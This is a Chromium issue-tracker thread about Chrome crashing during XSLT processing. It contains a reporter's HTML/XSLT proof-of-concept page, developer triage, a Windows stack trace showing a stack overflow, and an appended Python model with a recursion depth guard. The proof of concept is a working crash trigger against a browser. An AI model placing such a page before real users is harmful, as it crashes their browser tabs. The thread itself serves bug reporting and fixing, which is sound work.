Chrome crashes during XSLT processing.
Reported by proof131...@gmail.com, Oct 23
Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36

Steps to reproduce the problem:

POC:

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script id=o_xml type="text/plain"><?xml version="1.0" encoding="UTF-8"?>
<tag_name/>
</script>
<script id=o_xslt type="text/plain"><?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="42">
  <xsl:template match="*">
    <xsl:apply-imports/>
    <xsl:apply-templates select=".">
      <xsl:with-param name="whatever_1">whatever_2</xsl:with-param>
    </xsl:apply-templates>
  </xsl:template>
</xsl:stylesheet>
</script>
<script>
window.onload = function(){
  setTimeout(function(){ window.close(); }, 400);
  let doc = new DOMParser(), proc = new XSLTProcessor();
  proc.importStylesheet(doc.parseFromString(document.getElementById('o_xslt').textContent, "text/xml"));
  proc.transformToFragment(doc.parseFromString(document.getElementById('o_xml').textContent, "text/xml"), document);
};
</script>
</head>
</html>

Test live on: http://pwning.click/xsltproc.html

What is the expected behavior?
Chrome doesn't crash during XSLT processing.

What went wrong?
Chrome crashes during XSLT processing.

Did this work before? N/A

Chrome version: 69.0.3497.100 Channel: stable
OS Version: 10.0
Flash Version:
Oct 24
We're not able to reproduce this crash. Are you able to provide any more information (e.g. a stacktrace) for this crash? You may also provide a crash ID: https://www.chromium.org/for-testers/bug-reporting-guidelines/reporting-crash-bug
Oct 24
Testcase 5664736149241856 failed to reproduce the crash. Please inspect the program output at https://clusterfuzz.com/testcase?key=5664736149241856.
Oct 30
I can reproduce it locally on Canary on Windows. Crash ID 9626b78a54990cb8. Can a Blink>XML OWNER please take a look? Thanks!
Oct 31
Unfortunately, the stack trace for that crash ID is quite useless! It's Windows-specific, and indeed I cannot reproduce this bug on Chrome OS. XSLT might be tickling a Windows bug...? I'm going to pessimistically call this potential renderer memory corruption and rate it accordingly. If that turns out to be wrong, go right ahead and re-label the bug.
Oct 31
It's a stack overflow; I assume that's pretty common in user-supplied XML/XSLT, but I dunno. Do we treat stack overflows differently than OOM?
Nov 1
Nov 15
scottmg: Uh oh! This issue is still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Nov 29
scottmg: Uh oh! This issue is still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Dec 4
Stack overflow is the same as OOM, yeah. Also, I cannot reproduce this on Stable (70) on macOS. dcheng: scottmg is no longer on Chrome, and you're our only remaining XML OWNER! Could you please confirm the stack overflow hypothesis (seems likely?), and re-label this bug appropriately? Thanks!
Dec 5
I'm happy to call this a stack overflow:

00 0000003a`e6a03fd0 00007ffc`869e111b ntdll!RtlAllocateHeap+0x16d
01 0000003a`e6a04090 00007ffc`89b4b234 chrome_child!malloc+0x2b [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\base\allocator\allocator_shim_override_ucrt_symbols_win.h @ 53]
02 0000003a`e6a040d0 00007ffc`89b54bb0 chrome_child!xmlXPathNewNodeSet+0x14 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 4345]
03 0000003a`e6a04110 00007ffc`89b54a8c chrome_child!xmlXPathCompOpEval+0x938 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 13457]
04 0000003a`e6a041c0 00007ffc`89b5138b chrome_child!xmlXPathCompOpEval+0x814 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 13965]
05 0000003a`e6a04270 00007ffc`89b511b6 chrome_child!xmlXPathRunEval+0xc8 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 14545]
06 0000003a`e6a042b0 00007ffc`89b5101a chrome_child!xmlXPathCompiledEvalInternal+0x183 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 14913]
07 0000003a`e6a04370 00007ffc`8a77a3f8 chrome_child!xmlXPathCompiledEval+0x2b [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 14960]
08 0000003a`e6a043b0 00007ffc`8a77acb9 chrome_child!xsltPreCompEval+0x48 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 383]
09 0000003a`e6a04400 00007ffc`8a778294 chrome_child!xsltApplyTemplates+0xc5 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 4891]
0a 0000003a`e6a04530 00007ffc`8a777d81 chrome_child!xsltApplySequenceConstructor+0x275 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 2771]
0b 0000003a`e6a045f0 00007ffc`8a777611 chrome_child!xsltApplyXSLTTemplate+0x419 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 3227]
0c 0000003a`e6a04670 00007ffc`8a77b0f7 chrome_child!xsltProcessOneNode+0x44 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 0]
0d 0000003a`e6a046c0 00007ffc`8a778294 chrome_child!xsltApplyTemplates+0x503 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 5141]
0e 0000003a`e6a047f0 00007ffc`8a777d81 chrome_child!xsltApplySequenceConstructor+0x275 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 2771]
0f 0000003a`e6a048b0 00007ffc`8a777611 chrome_child!xsltApplyXSLTTemplate+0x419 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 3227]
10 0000003a`e6a04930 00007ffc`8a77b0f7 chrome_child!xsltProcessOneNode+0x44 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 0]
11 0000003a`e6a04980 00007ffc`8a778294 chrome_child!xsltApplyTemplates+0x503 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 5141]
12 0000003a`e6a04ab0 00007ffc`8a777d81 chrome_child!xsltApplySequenceConstructor+0x275 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 2771]
13 0000003a`e6a04b70 00007ffc`8a777611 chrome_child!xsltApplyXSLTTemplate+0x419 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 3227]

I didn't test on Mac / ChromeOS though, so I can't comment on why it doesn't repro there. (palmer, I'm not sure what other labels OOM bugs should get, but I made it non-security at least)
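The trace above repeats the cycle xsltApplyTemplates -> xsltApplySequenceConstructor -> xsltApplyXSLTTemplate -> xsltProcessOneNode without ever unwinding, because the POC's only template matches every element ("*") and then applies templates to the context node itself (select="."), so the same template is re-entered for the same node with no base case. The Python model below, an added example that is not Chromium's or libxslt's code, reproduces that dispatch loop for a tiny XSLT subset (match="*", select="." and select="*", plus the built-in rule for elements that no template matches) and shows the mitigation a processor needs: a depth guard that turns unbounded recursion into a reported error rather than a process crash. The names check_transform, TemplateRecursion, SAFE_XSLT and NESTED_XML are mine; xsl:apply-imports and xsl:with-param are parsed but ignored because they do not affect the recursion.

```python
import xml.etree.ElementTree as ET

XSL = "{http://www.w3.org/1999/XSL/Transform}"

# Constructed inputs: the reporter's document and stylesheet, a variant that
# descends to child elements instead of re-selecting the context node, and a
# nested document so the terminating variant has something to walk.
POC_XML = '<?xml version="1.0" encoding="UTF-8"?><tag_name/>'
POC_XSLT = """<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="42">
  <xsl:template match="*">
    <xsl:apply-imports/>
    <xsl:apply-templates select=".">
      <xsl:with-param name="whatever_1">whatever_2</xsl:with-param>
    </xsl:apply-templates>
  </xsl:template>
</xsl:stylesheet>"""
SAFE_XSLT = POC_XSLT.replace('select="."', 'select="*"')  # children, not self
NESTED_XML = "<a><b/><c><d/></c></a>"


class TemplateRecursion(Exception):
    """Raised when template nesting passes the limit, so the caller gets an
    error instead of the host process overflowing its stack."""


def load_templates(xslt_text):
    """Collect (match pattern, template element) pairs from a stylesheet."""
    root = ET.fromstring(xslt_text)
    return [(t.get("match"), t) for t in root.findall(XSL + "template")]


def select_nodes(select, context):
    """Tiny XPath subset: '.' is the context node; '*' (the default) is its
    element children. Anything else is rejected rather than guessed."""
    if select == ".":
        return [context]
    if select in (None, "*"):
        return list(context)
    raise ValueError("unsupported select expression: %r" % select)


def apply_templates(templates, context, depth, max_depth, stats):
    """Instantiate the first template matching `context`; recurse for each
    xsl:apply-templates in its body. `depth` counts nested instantiations."""
    if depth > max_depth:
        raise TemplateRecursion("template nesting exceeded %d at <%s>"
                                % (max_depth, context.tag))
    stats["instantiations"] += 1
    stats["max_depth"] = max(stats["max_depth"], depth)
    for match, body in templates:
        if match != "*":          # only the element wildcard is modelled
            continue
        for instr in body.iter(XSL + "apply-templates"):
            for node in select_nodes(instr.get("select"), context):
                apply_templates(templates, node, depth + 1, max_depth, stats)
        return
    # Built-in rule: no user template matched, so process the children.
    for child in context:
        apply_templates(templates, child, depth + 1, max_depth, stats)


def check_transform(xml_text, xslt_text, max_depth=100):
    """Run the model from the document's root element. Returns ('ok', stats)
    when the transform terminates and ('recursion', stats) when the guard
    fires; stats records instantiations and the deepest nesting reached."""
    templates = load_templates(xslt_text)
    root = ET.fromstring(xml_text)
    stats = {"instantiations": 0, "max_depth": 0}
    try:
        apply_templates(templates, root, 1, max_depth, stats)
    except TemplateRecursion:
        return "recursion", stats
    return "ok", stats


if __name__ == "__main__":
    print("POC stylesheet:", check_transform(POC_XML, POC_XSLT))
    print("select='*' on nested doc:", check_transform(NESTED_XML, SAFE_XSLT))
```

With the POC stylesheet the guard fires after exactly max_depth instantiations of the same template on the same node; with select="*" the recursion is bounded by the depth of the input tree and finishes normally. The difference is the whole bug: one character in the select expression decides whether the work per node is finite.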
Comment 1 by ClusterFuzz, Oct 24